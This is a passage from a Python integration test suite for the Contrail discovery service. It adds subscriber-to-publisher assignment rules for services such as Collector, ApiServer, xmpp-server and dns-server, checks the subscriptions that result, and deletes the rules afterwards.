rule_status = self.ds_obj.delete_and_verify_rule(collector_control_ip,\
'OpServer', collector_control_ip,'contrailWebUI')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_webui_with_api_server(self):
''' Validate that applied rules take effect correctly for
"contrailWebUI" and its subscription to API Server.
Steps:
1. Create rules for all contrailWebUI of 1 network to subscribe
to API Servers of the same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having ContrailWebUI
connected to API server running in different subnet.
'''
self.ds_obj.skip_discovery_test("ApiServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'supervisor-webui')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.cfgm_control_ips) > 0:
self.logger.info("Creating rules corresponding to config node *ApiServer*")
self.logger.info(" Subscribers are *contrailWebUI* running in same subnets")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(cfgm_control_ip,\
'ApiServer', cfgm_control_ip, 'contrailWebUI')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.webui_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrailWebUI', self.inputs.webui_control_ips[i], 'ApiServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(cfgm_control_ip,\
'ApiServer', cfgm_control_ip, 'contrailWebUI')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_vrouter_with_collector(self):
''' Validate that applied rules take effect correctly for
"contrail-vrouter-agent" and its subscription to Collector.
Steps:
1. Create rules for all contrail-vrouter-agent of 1 network
to subscribe to Collector of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of Collectors running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("Collector", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.collector_control_ips) > 0:
self.logger.info("Creating rules corresponding to collector node *Collector*")
self.logger.info(" Subscribers are *vrouter-agent* running in same subnets")
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 60 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_collector_with_multi_clients(self):
''' Validate that applied rules take effect correctly for multiple
clients mentioned sequentially in a single rule for Collector as
a Server/Publisher.
Steps:
1. Create a single rule for multiple types of clients to subscribe
to a single Publisher. Mention all subscribers in that rule.
2. Verify if rule is working as expected or not. Verify that all
clients subscribe to single publisher only.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of Collectors running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("Collector", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl(30, 30, 'contrail-vrouter-agent',\
'contrail-topology', 'contrail-control', 'contrail-api')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.collector_control_ips) > 0:
self.logger.info("Creating rules corresponding to collector node *Collector*")
self.logger.info("Subscribers are mulitple services running in same subnets")
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
self.ds_obj.discovery_rule_config( "add_rule",
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
result1 = self.ds_obj.discovery_rule_config( "find_rule",\
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
if result1 == False:
self.logger.error("# While searching, rule not found. Configuration failed #")
result = False
self.ds_obj.read_rule('default-discovery-service-assignment')
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep(30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher(\
ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
for i in range(0,len(self.inputs.bgp_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-control', \
self.inputs.bgp_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-topology',\
self.inputs.collector_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
for i in range(0,len(self.inputs.cfgm_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-api', \
self.inputs.cfgm_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
self.ds_obj.discovery_rule_config( 'del_rule',\
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
result1 = self.ds_obj.discovery_rule_config( "find_rule",\
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
if result1 == True:
self.logger.error("# While searching for the deleted rule, it was found. Deletion failed #")
result = False
self.ds_obj.read_rule("default-discovery-service-assignment")
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_subscribe_request_with_diff_instances_rules(self):
''' Validate that different instances of Publishers are assigned to
client based on the instance value requested by clients.
Also validate that if rules are present, requested instances are
restricted based on rules.
Steps:
1. Use a non contrail synthetic subscribe request to test this.
2. Use some instance value in subscribe request and verify that
requested instances of publisher are assigned.
3. Create a rule with same requested Publisher and subscribe request.
4. Verify that even if more instances are requested, the presence of the rule
restricts the request to only 1 instance of that publisher.
5. Delete the rule.
6. Again test that same subscribe request will again get all instances requested.
Precondition: Assumption is that setup is having a subscriber
connected to 3 instances of XMPP, all running in different subnets
Also, setup requirement of this test case is to have at least 3 publishers
All publishers should be in different network.
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params('change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("#### Sending a dummy client request with instance value 3 ##")
self.logger.info("### Client will subscribe to IfmapServer #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer", \
instances="3", min_instances="0",\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr= self.inputs.compute_control_ips[0], \
client_type= "TestClient")
sleep(2)
self.logger.debug("# Verifying the number of instances of publishers granted to the client #")
ifmap_server_count = len(self.inputs.cfgm_control_ips)
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
self.logger.debug("# The instances of publishers allocated to TestClient are %d #" \
% instances_allocated)
self.logger.debug("# The total number of publishers running of such types are %d #" \
% ifmap_server_count)
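# With instances=3 requested: a cluster running 3 or fewer IfmapServers should allocate all of
# them to the client, while a larger cluster should allocate exactly the 3 requested instances.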
if ifmap_server_count == instances_allocated or (ifmap_server_count > 3 and instances_allocated == 3):
self.logger.info("# Instance field working as expected #")
else:
self.logger.error("# Instance field not working as expected. #")
result = False
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now creating a rule to verify that even if multiple\
instances are requested but if a rule is present, it will limit the instances #")
self.ds_obj.add_and_verify_rule(self.inputs.cfgm_control_ips[0], \
'IfmapServer', self.inputs.compute_control_ips[0], 'TestClient')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep(30)
try:
self.logger.info("#### Sending a dummy client request with instance value 3 ##")
self.logger.info("### Client will subscribe to IfmapServer #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="3", min_instances="0",\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient")
sleep(2)
self.logger.debug("# Verifying the number of instances of publishers granted to the client #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
self.logger.debug("# Number of instances of Publishers used by TestClient are %d" \
% (instances_allocated))
self.logger.debug("# IPs of those publishers are %s #" % service_IPs)
if instances_allocated==1 and service_IPs[0]==self.inputs.cfgm_control_ips[0]:
self.logger.info("# As expected, TestClient is subscribed to only 1 instance of\
IfmapServer even if it is requesting for 3 instances. This happened because of rule present #")
pass
else:
result = False
self.logger.error("# TestClient is subscribed to less/more than 1 instance of IfmapServer.#")
self.logger.error("#Something went wrong. Expectedly, rules are not working.#")
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting a rule to verify that after rule is deleted,\
instances requested are granted without any restriction #")
self.ds_obj.delete_and_verify_rule(self.inputs.cfgm_control_ips[0], \
'IfmapServer', self.inputs.compute_control_ips[0], 'TestClient')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.info("#### Sending a dummy client request with instance value 3 ##")
self.logger.info("### Client will subscribe to IfmapServer #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="3", min_instances="0",\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient")
sleep(2)
self.logger.debug("# Verifying the number of instances of publishers granted to the client #")
ifmap_server_count = len(self.inputs.cfgm_control_ips)
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
self.logger.debug("# The instances of publishers allocated to TestClient are %d #" \
% instances_allocated)
self.logger.debug("# The total number of publishers running of such types are %d #"\
% ifmap_server_count)
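            # Once the rule is deleted, the original instance semantics apply again:
            # either all publishers or exactly the 3 requested instances.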
if ifmap_server_count == instances_allocated or (ifmap_server_count > 3 and instances_allocated == 3):
self.logger.info("# Instance field working as expected #")
else:
self.logger.error(" # Instance field not working as expected.#")
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_when_service_admin_down(self):
        ''' Validate that when the publisher mentioned in a rule is administratively
        down, the subscriber mentioned in the rule does not subscribe to any
        other publisher.
        Also verify that when the publisher comes back up, the subscriber
        mentioned in the rule gets a subscription from that publisher.
        For testing purposes, DNS-SERVER is used as the publisher and
        contrail-vrouter-agent as the client.
Steps:
1. Create a rule using any Publisher and subscriber pair.
2. Make the Publisher mentioned in the rule as admin down.
3. Verify that as service is down, the subscriber will not get any
other instance of that service because rule still holds true.
4. Make the Publisher as admin UP.
5. Verify that as soon as Publisher is made admin UP, the subscriber
will get that instance of service.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of DNS servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("dns-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("# Create a rule for control node Dns-Server ##")
self.logger.info("# Subscriber in rule as contrail-vrouter-agent#")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
self.logger.info("# Making the admin state of dsn-server as *down*# ")
self.ds_obj.update_service(ds_ip,service="dns-server",\
ip=self.inputs.bgp_control_ips[0],admin_state="down")
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 45 seconds so that TTL expiry for all subscriber happens ###")
sleep (45)
try:
self.logger.debug("# Verifying that as publisher is admin down,\
the mentioned subscriber in rule do not get any instance of Publisher #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="dns-server")
instances_allocated = len(client_subscribed_service_id)
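            # The rule still applies while its publisher is admin down, so the
            # subscriber should be left with zero instances rather than falling
            # back to some other dns-server.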
if instances_allocated==0:
self.logger.info("# \n As expected, contrail-vrouter-agent running on %s\n \
is not subscribed to any dns-server as the rule is restricting it to do\n \
that and publisher mentioned in rule is admin *down*. #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("# \n Even if rule is present and publisher in rule\n \
is admin *down*, some publisher got assigned to the subscriber\n \
contrail-vrouter-agent running on %s .#", self.inputs.compute_control_ips[0])
service_IPs = []
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
self.logger.warn("# The publisher assigned to the client are running at following IPs: %s ###"\
% service_IPs)
self.logger.info("# Making the admin state of dsn-server as *up*# ")
self.ds_obj.update_service(ds_ip,service="dns-server",\
ip=self.inputs.bgp_control_ips[0],admin_state="up")
self.logger.debug("\n #### Waiting for 5 seconds so that the client \n \
subscribe to the new subscriber as soon as it comes administratively up ###")
sleep(5)
self.logger.debug("\n # Verifying that as publisher is admin up,\n \
the mentioned subscriber in rule gets the same instance of Publisher \n \
as mentione din rule #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="dns-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
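            # Once the publisher is admin up again, the rule should steer the
            # subscriber back to exactly that one dns-server instance.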
if instances_allocated==1 and service_IPs[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # As expected, contrail-vrouter-agent running \n \
on %s is subscribed to single dns-server as the rule is \n \
restricting it to do that. #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if rule is present and publisher in rule\n \
is admin *up*, some different publishers or no publisher got \n \
assigned to the subscriber contrail-vrouter-agent running on %s .#"\
% self.inputs.compute_control_ips[0])
self.logger.error("# The publisher assigned to the client are running at following IPs: %s###" \
% service_IPs)
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_multiple_rule_same_subscriber(self):
        ''' Validate that a rule restricts the subscriber irrespective of the number
        of instances requested by the client.
        Also verify that, if multiple rules are present for the same client,
        more instances of the service get allocated to that client.
        For testing purposes, XMPP-SERVER is used as the publisher and
        contrail-vrouter-agent as the client.
Steps:
1. Create different rules with same subscriber values and different Publishers.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at least 2
publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("\n # Create a rule for xmpp-server running on\n \
control node and subscriber as contrail-vrouter-agent #")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],'xmpp-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("# Verifying that client is only subscribed to mentioned Publisher in the rule #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="xmpp-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs=[]
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
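            # A single rule should pin the agent to exactly the one xmpp-server
            # named in that rule.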
if instances_allocated==1 and service_IPs[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # Client contrail-vrouter-agent running on %s\n \
is subscribed to expected xmpp-server as the rule is restricting \n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if rule is present, subscription\n \
not happening as expected for contrail-vrouter-agent running on %s#"\
% self.inputs.compute_control_ips[0])
self.logger.error("\n # The publisher assigned to the client are\n \
running at following IPs: %s ###" % service_IPs)
self.logger.error("\n # Expected was that client will subscribe only\n \
to xmpp-server running on %s node" % self.inputs.bgp_control_ips[0])
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("\n # Create another rule for xmpp-server running on\n \
control node and subscriber as contrail-vrouter-agent so that \n \
2nd instance of xmpp-server gets a Publisher #")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[1],'xmpp-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("\n # Verifying that 2nd instance of the client is\n \
subscribed to mentioned Publisher in the rule #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"),service="xmpp-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs=[]
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
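            # With two rules for the same subscriber, both publishers named in
            # the rules should now be assigned.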
if instances_allocated==2 and service_IPs[0] in self.inputs.bgp_control_ips\
and service_IPs[1] in self.inputs.bgp_control_ips:
self.logger.info("\n # Client contrail-vrouter-agent running on %s\n \
is subscribed to expected xmpp-server as the rule is restricting\n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if 2 rules are present, subscription\n \
not happening as expected for contrail-vrouter-agent running on %s#"\
% self.inputs.compute_control_ips[0])
self.logger.error("\n # The publisher assigned to the client are running\n \
at following IPs: %s ###" % service_IPs)
self.logger.error("\n # Expected was that client will subscribe to\n \
xmpp-server running on %s and %s node" \
% (self.inputs.bgp_control_ips[0],self.inputs.bgp_control_ips[1]))
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'xmpp-server', self.inputs.compute_control_ips[0],'contrail-vrouter-agent:0')
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[1],\
'xmpp-server', self.inputs.compute_control_ips[0],'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_on_xmpp_do_not_impact_dns(self):
''' This test case is specifically written to test Bug ID "#1548771"
[Discovery-Rel3.0-Centos-1]: Applying rule on DNS-server affects the rule
entry already applied to XMPP server and vice versa.
(Tested for client type : vrouter-agent)
Steps:
1. Create 2 different rules with same subscriber as
"contrail-vrouter-agent" and using xmpp-server in rule
1 and dns-server in rule 2.
2. Verify that both the rules work independently without impacting each other.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP and DNS servers running in different subnets
Also, setup requirement of this test case is to have at least 2 publishers
and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("\n # Create 2 rules for xmpp-server and dns-server\n \
running on control node and subscriber as contrail-vrouter-agent#")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],\
'xmpp-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("\n# Verifying that client is only subscribed to\n \
mentioned Publishers in the rule #")
client_subscribed_xmpp_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="xmpp-server")
client_subscribed_dns_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="dns-server")
instances_allocated_xmpp = len(client_subscribed_xmpp_service_id)
instances_allocated_dns = len(client_subscribed_dns_service_id)
service_IPs_xmpp=[]
service_IPs_dns=[]
for i in range (0,instances_allocated_xmpp):
service_endpoint_xmpp = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_xmpp_service_id[i])
service_IPs_xmpp.append(service_endpoint_xmpp[0][0])
for i in range (0,instances_allocated_dns):
service_endpoint_dns = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_dns_service_id[i])
service_IPs_dns.append(service_endpoint_dns[0][0])
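            # The xmpp-server rule and the dns-server rule should be enforced
            # independently; the two checks below verify one rule each.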
if instances_allocated_xmpp==1 and service_IPs_xmpp[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # Client contrail-vrouter-agent running on %s\n \
is subscribed to expected xmpp-server as the rule is restricting\n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if rule is present, subscription not\n \
happening as expected for contrail-vrouter-agent running on %s .#" \
% self.inputs.compute_control_ips[0])
self.logger.debug("\n # The publisher assigned to the client are \n \
running at following IPs: %s ###" % service_IPs_xmpp)
self.logger.debug("\n # Expected was that client will subscribe only\n \
to xmpp-server running on %s node" % self.inputs.bgp_control_ips[0])
if instances_allocated_dns==1 and service_IPs_dns[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # Client contrail-vrouter-agent running on %s \n \
is subscribed to expected dns-server as the rule is restricting\n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n# Even if rule is present, subscription not\n \
happening as expected for contrail-vrouter-agent running on %s .#" \
% self.inputs.compute_control_ips[0])
self.logger.debug("\n# The publisher assigned to the client are \n \
running at following IPs: %s ###" % service_IPs_xmpp)
self.logger.debug("\n# Expected was that client will subscribe only\n \
to dns-server running on %s node" % self.inputs.bgp_control_ips[0])
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'xmpp-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
    @preposttest_wrapper
    def test_rule_with_vrouter_agent_do_not_impact_other_subscriptions(self):
''' This test case is specifically written to test Bug ID "#1541321"
[Discovery_R3.0_ubuntu_2704] : Rule mentioning contrail-vrouter-agent
affects all the subscriptions of that client with all Publishers
irrespective of the publisher mentioned in the rule. This happens for
1/2 cycle of TTL and things recover after that.
Steps:
1. Create a rule and mention subscriber as "contrail-vrouter-agent"
and using dns-server as publisher.
2. Verify that the configured rule do not impact subscription of
"contrail-vrouter-agent" to xmpp-server even for one TTL cycle .
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("\n # Find the instances of subscription of \n \
contrail-vrouter-agent to the xmpp-server server #")
xmpp_vrouter_subscription_list = self.ds_obj.get_all_xmpp_servers(ds_ip)
self.logger.info("\n # Create a rule for dns-server running on \n \
control node and subscriber as contrail-vrouter-agent #")
compute_control_ip = self.inputs.compute_control_ips[0].split('.')
compute_control_ip[2:4] = '0','0'
compute_control_ip = ".".join(compute_control_ip) + "/16"
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', compute_control_ip, 'contrail-vrouter-agent:0')
self.logger.debug("\n # Verify that subscription of vrouter-agent\n \
to xmpp-server is not impacted due to the above rule for 90 seconds #")
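            # Poll the xmpp-server subscription list once per second; any change
            # would mean the dns-server rule leaked into the xmpp subscriptions.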
for i in range(1,60):
new_xmpp_vrouter_subscription_list=self.ds_obj.get_all_xmpp_servers(ds_ip)
sleep(1)
if xmpp_vrouter_subscription_list == new_xmpp_vrouter_subscription_list:
pass
else:
self.logger.warn("\n #### Some assignment change has happened\n \
for vrouter agent subscription to xmpp-server #####")
self.logger.warn("\n #### Earlier service IDs in use were %s\n \
and after waiting for %i seconds, the service ID has changed to %s #####"\
% (xmpp_vrouter_subscription_list,i,new_xmpp_vrouter_subscription_list))
result = False
break
except Exception as e:
self.logger.error(e)
result = False
try:
